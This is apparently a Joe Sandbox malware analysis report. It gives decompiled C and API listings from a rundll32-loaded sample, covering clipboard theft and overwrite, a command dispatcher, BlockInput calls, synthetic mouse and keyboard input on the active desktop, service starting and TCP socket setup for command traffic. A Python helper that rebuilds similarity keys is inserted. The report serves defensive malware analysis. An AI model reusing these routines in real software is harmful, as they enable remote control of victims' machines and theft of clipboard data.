                                                            0x04654157
                                                            0x04654157
                                                            0x0465415a
                                                            0x0465416d
                                                            0x04654173
                                                            0x04654175
                                                            0x046542b4
                                                            0x046542b9
                                                            0x046542be
                                                            0x046542c3
                                                            0x046542c8
                                                            0x046542c9
                                                            0x046542ca
                                                            0x046542cb
                                                            0x046542cc
                                                            0x046542cd
                                                            0x046542ce
                                                            0x046542cf
                                                            0x046542d1
                                                            0x046542d6
                                                            0x046542dd
                                                            0x046542e0
                                                            0x046542e3
                                                            0x046542e9
                                                            0x046542ec
                                                            0x046542f4
                                                            0x046542fa
                                                            0x04654303
                                                            0x04654309
                                                            0x04654314
                                                            0x0465417b
                                                            0x04654189
                                                            0x0465418f
                                                            0x04654191
                                                            0x046541b0
                                                            0x046541b0
                                                            0x04654193
                                                            0x046541a3
                                                            0x046541a8
                                                            0x04654259
                                                            0x04654259
                                                            0x0465425e
                                                            0x0465425e
                                                            0x04654261
                                                            0x04654263
                                                            0x04654265
                                                            0x04654267
                                                            0x04654275
                                                            0x04654281
                                                            0x04654286
                                                            0x04654288
                                                            0x04654291
                                                            0x04654291
                                                            0x04654288
                                                            0x04654267
                                                            0x04654298
                                                            0x046542a4
                                                            0x046542b1
                                                            0x046542b1
                                                            0x04654175
                                                            0x0465402f
                                                            0x04654034
                                                            0x04654037
                                                            0x04654039
                                                            0x0465403d
                                                            0x0465403f
                                                            0x00000000
                                                            0x04654041
                                                            0x04654041
                                                            0x04654045
                                                            0x00000000
                                                            0x04654047
                                                            0x04654047
                                                            0x0465404a
                                                            0x0465404f
                                                            0x04654054
                                                            0x04654056
                                                            0x00000000
                                                            0x04654058
                                                            0x04654058
                                                            0x0465405f
                                                            0x04654067
                                                            0x0465406c
                                                            0x0465406c
                                                            0x04654056
                                                            0x04654045
                                                            0x0465403f
                                                            0x0465402d
                                                            0x04653ffe
                                                            0x04654007
                                                            0x04654007
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04653ee7
                                                            0x04653ee2
                                                            0x04653e6c
                                                            0x04653e6c
                                                            0x04653f9f
                                                            0x04653f9f
                                                            0x04653fa1
                                                            0x00000000
                                                            0x04653fa1
                                                            0x04653e6a
                                                            0x04653e47
                                                            0x04653e04
                                                            0x04653e04
                                                            0x04653e08
                                                            0x00000000
                                                            0x04653e0a
                                                            0x04653e0f
                                                            0x04653e16
                                                            0x04653e20
                                                            0x04653e25
                                                            0x04653e2a
                                                            0x04653e2d
                                                            0x04653e2f
                                                            0x00000000
                                                            0x04653e31
                                                            0x04653e31
                                                            0x00000000
                                                            0x04653e31
                                                            0x04653e2f
                                                            0x04653e08
                                                            0x04653df3
                                                            0x04653fa3
                                                            0x04653fb6
                                                            0x04653fb6

                                                            APIs
                                                              • Part of subcall function 0464D020: StrChrW.SHLWAPI(?,0000003A), ref: 0464D044   (0x3A is ':', consistent with splitting a host:port string)
                                                              • Part of subcall function 0464D0D0: WSASetLastError.WS2_32(00002741), ref: 0464D0FA   (0x2741 = 10049 = WSAEADDRNOTAVAIL)
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,04653D36,?,?,?,?,FFFFFFFF,?), ref: 04653E31
                                                            • socket.WS2_32(00000000,00000001,00000006), ref: 04653E5A   (0, 1, 6 = AF_UNSPEC, SOCK_STREAM, IPPROTO_TCP)
                                                            • WSAGetLastError.WS2_32 ref: 04653E6C
                                                              • Part of subcall function 0464D0D0: WSAStringToAddressW.WS2_32(?,?,00000000,?,?), ref: 0464D12F
                                                              • Part of subcall function 0464D0D0: htons.WS2_32 ref: 0464D13F
                                                            • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,FFFFFFFF,00000000,00000000), ref: 04653ECC   (0x98000004 = SIO_KEEPALIVE_VALS; 0xC = sizeof(struct tcp_keepalive), i.e. TCP keep-alive tuning on the C2 socket)
                                                            • WSAGetLastError.WS2_32 ref: 04653ED7
                                                            • bind.WS2_32(?,00000002,0000001C), ref: 04653F8D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$AddressIoctlStringbindhtonssocket
                                                            • String ID:
                                                            • API String ID: 1590887309-0
                                                            • Opcode ID: bec11ef100987918adfd154f4332dbbcb08283f478b7b6a7a1906fa369c899ef
                                                            • Instruction ID: 302bb47639eb0786774ceb2d75287178820c640468677a7ec4c2082fc679adde
                                                            • Opcode Fuzzy Hash: bec11ef100987918adfd154f4332dbbcb08283f478b7b6a7a1906fa369c899ef
                                                            • Instruction Fuzzy Hash: 2F618171E002059BEB14DFA8E884BAEB7B5EF58750F10422AFD15E73A0F774AD818B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04645570: GetCurrentThreadId.KERNEL32 ref: 04645588
                                                              • Part of subcall function 04645570: GetThreadDesktop.USER32(00000000), ref: 0464558F
                                                              • Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 046455CF   (2 = UOI_NAME: desktop name into a 0x100-byte buffer)
                                                              • Part of subcall function 04645570: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 046455DA   (0x02000000 = MAXIMUM_ALLOWED)
                                                              • Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0464560E   (2 = UOI_NAME)
                                                              • Part of subcall function 04645570: lstrcmpi.KERNEL32(?,?), ref: 0464561E   (the call sequence indicates a compare of the thread's desktop name against the input desktop's before SetThreadDesktop)
                                                              • Part of subcall function 04645570: SetThreadDesktop.USER32(00000000), ref: 04645629
                                                              • Part of subcall function 04645570: CloseDesktop.USER32(?), ref: 0464563D
                                                              • Part of subcall function 04645570: CloseDesktop.USER32(00000000), ref: 04645640
                                                            • SetCursorPos.USER32(?,7497ADB0), ref: 04642127
                                                            • WindowFromPoint.USER32(?,7497ADB0,?,?,?,?,?,04641DC9,?,?), ref: 0464212F
                                                            • SetCapture.USER32(00000000,?,?,?,?,?,04641DC9,?,?), ref: 04642136
                                                            • keybd_event.USER32(00000000,00000000), ref: 0464217B
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0464222C   (4 = MOUSEEVENTF_LEFTUP; synthetic mouse input on the selected desktop)
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Thread$CloseInformationObjectUser$CaptureCurrentCursorFromInputOpenPointWindowkeybd_eventlstrcmpimouse_event
                                                            • String ID:
                                                            • API String ID: 3538182014-0
                                                            • Opcode ID: ac99602a4c52cb25501af5126858e60a430c4432832817a7fcca9d0d136a0030
                                                            • Instruction ID: 52af94ce00842c09cfdbb5010166c47654a025b205f99469ba0c2e67b9d604a2
                                                            • Opcode Fuzzy Hash: ac99602a4c52cb25501af5126858e60a430c4432832817a7fcca9d0d136a0030
                                                            • Instruction Fuzzy Hash: F351D0317D0300BAFB358A64AC5BF667A59DB85F94F314142FB01BF2C5F6E478409A68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 48%
                                                            			E04637510(intOrPtr __ecx) {
                                                            				// Clipboard read: takes the current CF_UNICODETEXT (0xd) clipboard contents,
                                                            				// prefixes them with a one-byte type tag (0x79) and hands the buffer to
                                                            				// E04631C60 through the object field at __ecx+4 (inferred: the transport/send routine).
                                                            				void* _v8;
                                                            				intOrPtr _v12;
                                                            				void* __esi;
                                                            				int _t9;
                                                            				void* _t12;
                                                            				void* _t20;
                                                            				void* _t24;
                                                            				void* _t28;
                                                            				void* _t30;
                                                            				char* _t31;
                                                            
                                                            				_t22 = __ecx;
                                                            				_v12 = __ecx;
                                                            				_t9 = OpenClipboard(0);
                                                            				if(_t9 == 0) {
                                                            					return _t9;
                                                            				}
                                                            				if(IsClipboardFormatAvailable(0xd) != 0) { // 0xd == CF_UNICODETEXT
                                                            					_t12 = GetClipboardData(0xd);
                                                            					_t20 = _t12;
                                                            					if(_t20 != 0) {
                                                            						GlobalFix(_t20); // locks the handle; the decompiler uses the eax left behind (_t12) as the data pointer
                                                            						_v8 = _t12;
                                                            						_t39 = _t12;
                                                            						if(_t12 != 0) {
                                                            							_push(_t30);
                                                            							_t3 = GlobalSize(_t20) + 1; // 0x1; clipboard size plus one tag byte
                                                            							_t28 = _t3;
                                                            							_push(_t28);
                                                            							_t31 = L04655B55(_t22, _t30, _t39); // allocates _t28 bytes (inferred heap allocator)
                                                            							_t4 = _t28 - 1; // 0x0; payload length == GlobalSize
                                                            							_t6 = _t31 + 1; // 0x1; payload starts after the tag byte
                                                            							_t24 = _t6;
                                                            							 *_t31 = 0x79; // tag byte ('y') marks the buffer as clipboard data for the receiver
                                                            							E0465E060(_t24, _v8, _t4); // memcpy-like (dst, src, len): copy the clipboard text behind the tag
                                                            							GlobalUnWire(_t20);
                                                            							_push(_t24);
                                                            							_push(0x3f);
                                                            							_push(_t28);
                                                            							_push(_t31);
                                                            							E04631C60( *((intOrPtr*)(_v12 + 4))); // send/queue: (buffer, length, 0x3f, pointer past the tag)
                                                            							L04655B0F(_t31); // frees the temporary buffer (inferred)
                                                            						}
                                                            					}
                                                            				}
                                                            				return CloseClipboard();
                                                            			}
                                                            (Instruction address column for E04637510: 0x04637510 to 0x046375a4.)

                                                            APIs
                                                            • OpenClipboard.USER32(00000000), ref: 0463751B
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 04637527   (0xD = CF_UNICODETEXT)
                                                            • GetClipboardData.USER32(0000000D), ref: 04637534   (0xD = CF_UNICODETEXT)
                                                            • GlobalFix.KERNEL32(00000000), ref: 04637541   (obsolete Win16-compatibility export; together with GlobalUnWire a useful import-table indicator)
                                                            • GlobalSize.KERNEL32(00000000), ref: 04637551
                                                            • GlobalUnWire.KERNEL32(00000000), ref: 04637579
                                                            • CloseClipboard.USER32 ref: 0463759B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$Global$AvailableCloseDataFormatOpenSizeWire
                                                            • String ID:
                                                            • API String ID: 339718915-0
                                                            • Opcode ID: 8a572fd38f7b06cdd890a6d9510010f09cece48ff21e6fdd83caeffe8dddad34
                                                            • Instruction ID: 50eae53324b5b5eaa2085e2b9c49be9d7b139603563c160f85decf801421a7f8
                                                            • Opcode Fuzzy Hash: 8a572fd38f7b06cdd890a6d9510010f09cece48ff21e6fdd83caeffe8dddad34
                                                            • Instruction Fuzzy Hash: F311A9B5640346BBD7186B70AC8CF5A7B6CEF5530AF044469F90A92241FE35EA14C771
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
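                                                            The "API ID" line under Similarity in each listing above (for example Clipboard$Global$AvailableCloseDataFormatOpenSizeWire) reads as a coarse similarity key built from the API names; its construction is not documented on the page. The following Python is an added example, not part of the report and not Joe Sandbox's own code: it parses the APIs bullets in the format shown on this page and rebuilds the key under an inferred rule (split each API name at capital letters, keep tokens of four or more characters, group tokens by how often they occur, sort alphabetically within a group, join groups with '$'). The rule is the editor's reconstruction from the three listings above, all of which it reproduces; the API String ID and the fuzzy hashes are not derived here. The sample input is copied verbatim from the three listings.

```python
import re
from collections import Counter

# One bullet of a Joe Sandbox "APIs" block. The bullet, the "Part of subcall
# function" prefix and the argument list are each optional, e.g.
#   • Part of subcall function 0464D0D0: htons.WS2_32 ref: 0464D13F
#   • socket.WS2_32(00000000,00000001,00000006), ref: 04653E5A
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Inferred rule (assumption, not Joe Sandbox's documented algorithm): split a
# name at each capital letter, keep all-lowercase names (socket, lstrcmpi,
# mouse_event) whole, drop tokens shorter than four characters. The keys on this
# page contain Wire/From/Data but never Fix/Get/Set/Pos/Id, which pins the
# threshold at four.
TOKEN = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9_]+")
MIN_TOKEN = 4


def parse_api_lines(text):
    """One dict per recognised API bullet; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append({
                "api": m["api"],
                "module": m["module"],
                "args": m["args"].split(",") if m["args"] is not None else [],
                "ref": int(m["ref"], 16),
                "subcall": int(m["sub"], 16) if m["sub"] else None,
            })
    return calls


def api_id(api_names):
    """Tokens grouped by descending frequency, ASCII-sorted inside each group
    (so CamelCase tokens precede lowercase names), groups joined with '$'.
    A call listed twice counts twice."""
    counts = Counter(tok for name in api_names
                     for tok in TOKEN.findall(name) if len(tok) >= MIN_TOKEN)
    by_freq = {}
    for tok, n in counts.items():
        by_freq.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_freq[n])) for n in sorted(by_freq, reverse=True))


def api_id_for_listing(text):
    return api_id(c["api"] for c in parse_api_lines(text))


# Sample input: the three APIs listings from this page, copied verbatim.
NET_APIS = """
• Part of subcall function 0464D020: StrChrW.SHLWAPI(?,0000003A), ref: 0464D044
• Part of subcall function 0464D0D0: WSASetLastError.WS2_32(00002741), ref: 0464D0FA
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,04653D36,?,?,?,?,FFFFFFFF,?), ref: 04653E31
• socket.WS2_32(00000000,00000001,00000006), ref: 04653E5A
• WSAGetLastError.WS2_32 ref: 04653E6C
• Part of subcall function 0464D0D0: WSAStringToAddressW.WS2_32(?,?,00000000,?,?), ref: 0464D12F
• Part of subcall function 0464D0D0: htons.WS2_32 ref: 0464D13F
• WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,FFFFFFFF,00000000,00000000), ref: 04653ECC
• WSAGetLastError.WS2_32 ref: 04653ED7
• bind.WS2_32(?,00000002,0000001C), ref: 04653F8D
"""
DESKTOP_APIS = """
• Part of subcall function 04645570: GetCurrentThreadId.KERNEL32 ref: 04645588
• Part of subcall function 04645570: GetThreadDesktop.USER32(00000000), ref: 0464558F
• Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 046455CF
• Part of subcall function 04645570: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 046455DA
• Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0464560E
• Part of subcall function 04645570: lstrcmpi.KERNEL32(?,?), ref: 0464561E
• Part of subcall function 04645570: SetThreadDesktop.USER32(00000000), ref: 04645629
• Part of subcall function 04645570: CloseDesktop.USER32(?), ref: 0464563D
• Part of subcall function 04645570: CloseDesktop.USER32(00000000), ref: 04645640
• SetCursorPos.USER32(?,7497ADB0), ref: 04642127
• WindowFromPoint.USER32(?,7497ADB0,?,?,?,?,?,04641DC9,?,?), ref: 0464212F
• SetCapture.USER32(00000000,?,?,?,?,?,04641DC9,?,?), ref: 04642136
• keybd_event.USER32(00000000,00000000), ref: 0464217B
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0464222C
"""
CLIPBOARD_APIS = """
• OpenClipboard.USER32(00000000), ref: 0463751B
• IsClipboardFormatAvailable.USER32(0000000D), ref: 04637527
• GetClipboardData.USER32(0000000D), ref: 04637534
• GlobalFix.KERNEL32(00000000), ref: 04637541
• GlobalSize.KERNEL32(00000000), ref: 04637551
• GlobalUnWire.KERNEL32(00000000), ref: 04637579
• CloseClipboard.USER32 ref: 0463759B
"""

if __name__ == "__main__":
    for name, listing in (("network", NET_APIS), ("desktop", DESKTOP_APIS),
                          ("clipboard", CLIPBOARD_APIS)):
        print(f"{name:10} {api_id_for_listing(listing)}")
```

                                                            Computing the same key over listings pasted from other reports groups functions that differ only in load address, which is how the clipboard read/write pair above can be tracked across later samples of the family. The length threshold of four and the ASCII tie-break are assumptions fitted to these three listings; re-check them against any listing whose published API ID disagrees.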

                                                            C-Code - Quality: 100%
                                                            			E046374B0(intOrPtr _a4, long _a8) {
                                                            				// Clipboard write: replaces the clipboard with _a8 bytes from _a4 as
                                                            				// CF_UNICODETEXT. Counterpart of E04637510 above; together they give the
                                                            				// module two-way clipboard transfer.
                                                            				int _t4;
                                                            				void* _t6;
                                                            				void* _t12;
                                                            
                                                            				_t4 = OpenClipboard(0);
                                                            				if(_t4 == 0) {
                                                            					return _t4;
                                                            				}
                                                            				EmptyClipboard();
                                                            				_t6 = GlobalAlloc(2, _a8); // 2 == GMEM_MOVEABLE, as SetClipboardData requires
                                                            				_t12 = _t6;
                                                            				if(_t12 != 0) {
                                                            					GlobalFix(_t12); // locks the block; the decompiler uses the eax left behind (_t6) as the data pointer
                                                            					if(_t6 != 0) {
                                                            						E0465E060(_t6, _a4, _a8); // memcpy-like (dst, src, len): copy the supplied text into the block
                                                            						GlobalUnWire(_t12);
                                                            						SetClipboardData(0xd, _t12); // 0xd == CF_UNICODETEXT; the block is now owned by the clipboard, so it is not freed
                                                            					}
                                                            				}
                                                            				return CloseClipboard();
                                                            			}






                                                            0x046374b5
                                                            0x046374bd
                                                            0x04637509
                                                            0x04637509
                                                            0x046374c0
                                                            0x046374cb
                                                            0x046374d1
                                                            0x046374d5
                                                            0x046374d8
                                                            0x046374e0
                                                            0x046374e9
                                                            0x046374f2
                                                            0x046374fb
                                                            0x046374fb
                                                            0x046374e0
                                                            0x00000000

                                                            APIs
                                                            • OpenClipboard.USER32(00000000), ref: 046374B5
                                                            • EmptyClipboard.USER32 ref: 046374C0
                                                            • GlobalAlloc.KERNEL32(00000002,?,?,?,04636D8A,?,?), ref: 046374CB
                                                            • GlobalFix.KERNEL32(00000000), ref: 046374D8
                                                            • GlobalUnWire.KERNEL32(00000000), ref: 046374F2
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 046374FB
                                                            • CloseClipboard.USER32 ref: 04637501
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$Global$AllocCloseDataEmptyOpenWire
                                                            • String ID:
                                                            • API String ID: 2050416147-0
                                                            • Opcode ID: 6ebfc391bd23db6ecf04dbf0759fe71201eb98d6c72ac6cd827dc26bd47b1c18
                                                            • Instruction ID: 0a70271849705e5052acac67be4309386d66eaa5a584b7fd3f79b1abc1ee0efa
                                                            • Opcode Fuzzy Hash: 6ebfc391bd23db6ecf04dbf0759fe71201eb98d6c72ac6cd827dc26bd47b1c18
                                                            • Instruction Fuzzy Hash: 0FF01232581214EBDB1A2FA0AC0DB9F3B1CEF1476BF049010FA0595155FF399A209BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E04643750(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v32;
                                                            				struct _SERVICE_STATUS _v36;
                                                            				signed int _t5;
                                                            				void* _t17;
                                                            				short* _t23;
                                                            				void* _t24;
                                                            				signed int _t27;
                                                            
                                                            				_t5 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t5 ^ _t27;
                                                            				_t23 = __ecx;
                                                            				_t17 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t17 != 0) {
                                                            					_t24 = OpenServiceW(_t17, _t23, 0x14);
                                                            					if(_t24 != 0) {
                                                            						if(QueryServiceStatus(_t24,  &_v36) != 0) {
                                                            							if(_v32 != 4) {
                                                            								StartServiceW(_t24, 0, 0);
                                                            								_t26 =  !=  ? 1 : 0;
                                                            							}
                                                            						}
                                                            						CloseServiceHandle(_t24);
                                                            					}
                                                            					CloseServiceHandle(_t17);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t27);
                                                            			}











                                                            0x04643756
                                                            0x0464375d
                                                            0x0464376a
                                                            0x04643774
                                                            0x04643778
                                                            0x04643784
                                                            0x04643788
                                                            0x04643797
                                                            0x0464379d
                                                            0x046437ab
                                                            0x046437b8
                                                            0x046437b8
                                                            0x0464379d
                                                            0x046437bc
                                                            0x046437bc
                                                            0x046437c3
                                                            0x046437c3
                                                            0x046437db

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0464376E
                                                            • OpenServiceW.ADVAPI32(00000000,?,00000014), ref: 0464377E
                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 0464378F
                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 046437AB
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 046437BC
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 046437C3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ManagerQueryStartStatus
                                                            • String ID:
                                                            • API String ID: 2710452061-0
                                                            • Opcode ID: 36f063ef6d905b83b12fd3e1a3edc3d0bdd284b2994c8516fe50ec976b0c3b79
                                                            • Instruction ID: b49ce2a2ba8c0bc574afe324a70e2e7a1b1ade4357f868e3147a1cc54ce43feb
                                                            • Opcode Fuzzy Hash: 36f063ef6d905b83b12fd3e1a3edc3d0bdd284b2994c8516fe50ec976b0c3b79
                                                            • Instruction Fuzzy Hash: 6A019272701214ABEB245B759C8CF7B7ABCEB85B51F01102DFD06D2342FE68EC4586A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E04641D40(void* __ecx, void* __esi, signed char* _a4, signed int _a8) {
                                                            				void* _t23;
                                                            
                                                            				_t23 = ( *_a4 & 0x000000ff) + 0xffffffeb;
                                                            				if(_t23 > 0x63) {
                                                            					L13:
                                                            					return _t23;
                                                            				} else {
                                                            					switch( *((intOrPtr*)(( *(_t23 + 0x4641e6c) & 0x000000ff) * 4 +  &M04641E3C))) {
                                                            						case 0:
                                                            							__eax =  *(__ebx + 1) & 0x000000ff;
                                                            							return E04641C30(__ecx,  *(__ebx + 1) & 0x000000ff);
                                                            							goto L14;
                                                            						case 1:
                                                            							__al =  *(__ebx + 1);
                                                            							 *(__edi + 0x18) = __al;
                                                            							__al & 0x000000ff =  *(__edi + 0xb0);
                                                            							__eax =  *(__edi + 0xb0) + 4;
                                                            							__eflags = __eax;
                                                            							return __eax;
                                                            							goto L14;
                                                            						case 2:
                                                            							return E046456E0();
                                                            							goto L14;
                                                            						case 3:
                                                            							_push(0);
                                                            							__imp__BlockInput();
                                                            							__eax = _a8;
                                                            							__ecx = __edi;
                                                            							__eax = _a8 - 1;
                                                            							__eflags = _a8 - 1;
                                                            							__eax = __ebx + 1;
                                                            							__eax = E04642090(__ebx, __edi, __ebx + 1, __ebx + 1);
                                                            							_push( *(__edi + 0x10));
                                                            							__imp__BlockInput();
                                                            							return __eax;
                                                            							goto L14;
                                                            						case 4:
                                                            							__eax =  *(__ebx + 1) & 0x000000ff;
                                                            							_push(__eax);
                                                            							 *(__edi + 0x10) = __eax;
                                                            							__imp__BlockInput();
                                                            							return __eax;
                                                            							goto L14;
                                                            						case 5:
                                                            							__eax =  *(__ebx + 1) & 0x000000ff;
                                                            							 *(__edi + 0x14) = __eax;
                                                            							return __eax;
                                                            							goto L14;
                                                            						case 6:
                                                            							__eax =  *(__ebx + 1) & 0x000000ff;
                                                            							__ecx =  *(__edi + 0xb0);
                                                            							 *(__edi + 0x1c) =  *(__ebx + 1) & 0x000000ff;
                                                            							return E046429E0( *(__edi + 0xb0),  *(__ebx + 1) & 0x000000ff);
                                                            							goto L14;
                                                            						case 7:
                                                            							return E04637510(__ecx);
                                                            							goto L14;
                                                            						case 8:
                                                            							_a8 = _a8 - 1;
                                                            							__eflags = _a8 - 1;
                                                            							__eax = __ebx + 1;
                                                            							return E046374B0(__ebx + 1, __ebx + 1);
                                                            							goto L14;
                                                            						case 9:
                                                            							return SetEvent( *(__ecx + 8));
                                                            							goto L14;
                                                            						case 0xa:
                                                            							return E04641FE0(__ecx, __esi, __eflags);
                                                            						case 0xb:
                                                            							goto L13;
                                                            					}
                                                            				}
                                                            				L14:
                                                            			}




                                                            0x04641d4d
                                                            0x04641d53
                                                            0x04641e39
                                                            0x04641e39
                                                            0x04641d59
                                                            0x04641d60
                                                            0x00000000
                                                            0x04641d76
                                                            0x04641d83
                                                            0x00000000
                                                            0x00000000
                                                            0x04641d86
                                                            0x04641d89
                                                            0x04641d90
                                                            0x04641d96
                                                            0x04641d96
                                                            0x04641da3
                                                            0x00000000
                                                            0x00000000
                                                            0x04641dae
                                                            0x00000000
                                                            0x00000000
                                                            0x04641db1
                                                            0x04641db3
                                                            0x04641db9
                                                            0x04641dbc
                                                            0x04641dbe
                                                            0x04641dbe
                                                            0x04641dc0
                                                            0x04641dc4
                                                            0x04641dc9
                                                            0x04641dcc
                                                            0x04641dd5
                                                            0x00000000
                                                            0x00000000
                                                            0x04641dd8
                                                            0x04641ddc
                                                            0x04641ddd
                                                            0x04641de0
                                                            0x04641de9
                                                            0x00000000
                                                            0x00000000
                                                            0x04641dec
                                                            0x04641df0
                                                            0x04641df6
                                                            0x00000000
                                                            0x00000000
                                                            0x04641df9
                                                            0x04641dfd
                                                            0x04641e04
                                                            0x04641e0f
                                                            0x00000000
                                                            0x00000000
                                                            0x04641e1a
                                                            0x00000000
                                                            0x00000000
                                                            0x04641e20
                                                            0x04641e20
                                                            0x04641e22
                                                            0x04641e2e
                                                            0x00000000
                                                            0x00000000
                                                            0x04641d73
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04641d60
                                                            0x00000000

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BlockInput$EventExchangeInterlocked
                                                            • String ID:
                                                            • API String ID: 2024910948-0
                                                            • Opcode ID: 18bea0c779e737a144fd18be5c2d7eda151a9a903009798b26f7214c3e2b1327
                                                            • Instruction ID: 97f35312afd1174b088c7f0c26a7df821db766a56cc8c286b70c13e9dd7109a5
                                                            • Opcode Fuzzy Hash: 18bea0c779e737a144fd18be5c2d7eda151a9a903009798b26f7214c3e2b1327
                                                            • Instruction Fuzzy Hash: E5210A7B208248DFDB009FA6F884E6DFB68FBD42367048267F608CA501D626E571D774
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • htons.WS2_32(?), ref: 0464DBDE
                                                            • bind.WS2_32(?,00000002,0000001C), ref: 0464DC02
                                                            • bind.WS2_32(?,?,00000010), ref: 0464DC42
                                                            • InterlockedIncrement.KERNEL32(04687B58), ref: 0464DC6C
                                                            • InterlockedIncrement.KERNEL32(04687B58), ref: 0464DC77
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: IncrementInterlockedbind$htons
                                                            • String ID:
                                                            • API String ID: 1901664375-0
                                                            • Opcode ID: 2d4594ac296ec77dc40be0ca24cc5816998180f0b8f23a319efb7be3729571f7
                                                            • Instruction ID: 9151ce3d655358aca5fdff24e11bb2b98b08b6bebbdce5661611cfbecf9f539f
                                                            • Opcode Fuzzy Hash: 2d4594ac296ec77dc40be0ca24cc5816998180f0b8f23a319efb7be3729571f7
                                                            • Instruction Fuzzy Hash: E2318172E001189BDF14EF6CE8859EEB3A5FF99310B01526EEC1597290FBB4AD909790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0463B840() {
                                                            				signed int _t25;
                                                            				intOrPtr _t27;
